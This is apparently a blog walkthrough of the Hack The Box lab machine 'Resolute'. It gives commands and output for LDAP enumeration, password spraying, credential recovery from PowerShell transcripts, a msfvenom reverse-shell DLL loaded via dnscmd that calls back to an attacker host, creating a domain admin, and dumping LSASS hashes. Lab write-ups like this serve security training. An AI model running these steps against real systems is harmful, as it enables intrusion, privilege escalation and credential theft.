Zumpyx Blog

Resolute

Machines#220MediumWindows

Recon & Enum

export IP=10.10.10.169

  • nmap -sC -A -p- --min-rate 1000 -T4 $IP
PORT      STATE  SERVICE      VERSION
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-12 07:55:38Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49678/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49679/tcp open   msrpc        Microsoft Windows RPC
49684/tcp open   msrpc        Microsoft Windows RPC
49707/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...
Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2024-01-11T23:56:51-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-12T07:56:52
|_  start_date: 2024-01-12T07:52:54
|_clock-skew: mean: 2h47m00s, deviation: 4h37m09s, median: 6m59s
  • crackmapexec smb $IP -u guest -p '' --shares

Pasted+image+20240112155414.png

  • ldapsearch
ldapsearch -x -H "ldap://$IP" -s base namingContexts
---
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local

ldapsearch -x -H "ldap://$IP" -b "DC=megabank,DC=local" > ldap_megabank_local.txt
cat ldap_megabank_local.txt | grep userPrincipalName
---
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]
userPrincipalName: [email protected]

cat ldap_megabank_local.txt | grep 'OU=Service Accounts'
cat ldap_megabank_local.txt | grep assw
---
...
badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 0
...

Shell as User - melanie

  • 密码喷射

Pasted+image+20240112165901.png

  • evil-winrm -i $IP -u 'melanie' -p 'Welcome123!'

Pasted+image+20240112170759.png

Shell as User - ryan

  • 遛狗,发现这个用户没啥权限

Pasted+image+20240115160729.png

  • 跑一下 WinPeas 没有可利用的信息

  • 查看本地文件,发现 PSTranscripts 目录

Pasted+image+20240115163133.png

  • 发现 ryan 用户凭据

Pasted+image+20240115163302.png

  • evil-winrm -i $IP -u ryan -p 'Serv3r4Admin4cc123!'

Pasted+image+20240115163523.png

  • 发现此用户为 DNS 管理员

Pasted+image+20240115160954.png

Shell as Root

ryan 是 DNS 管理员,因此可以使用 dnscmd.exe 指定应由 DNS 加载的插件 DLL 反弹 Shell

  • 生成 reverse shell dll 文件 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.18 LPORT=2233 -f dll -o good.dll

  • 启动 smb 服务

Pasted+image+20240115170345.png

  • 利用 dnscmd.exe 加载 good.dll,重启服务获取 shell
dnscmd.exe localhost /config /serverlevelplugindll \\10.10.16.18\good\good.dll
sc.exe stop dns
sc.exe start dns

Pasted+image+20240115170425.png

Dump Hash

  • 添加域管
net user newboy Admin@123 /add /domain
net group "domain admins" newboy /add /domain
  • lsassy megabank.local -u newboy -p 'Admin@123' -dc-ip $IP
[+] megabank.local Authentication successful
[+] megabank.local Lsass dumped in C:\Windows\Temp\jY2.sys (148886946 Bytes)
[+] megabank.local Lsass dump deleted
[+] megabank.local MEGABANK\RESOLUTE$            [NT] 84ab27f4fa73cd812c44dd4f3c141f6c | [SHA1] a1bb1366976dc62859f90e015ded4509cb2c46cc
[+] megabank.local MEGABANK\Administrator        [NT] fb3b106896cdaa8a08072775fbd9afe9 | [SHA1] 03006b77aacca0a1e25f4134c6e2f1ef13a82a19
[+] megabank.local megabank.local\Administrator  [PWD] DontH4ckUsPleeze!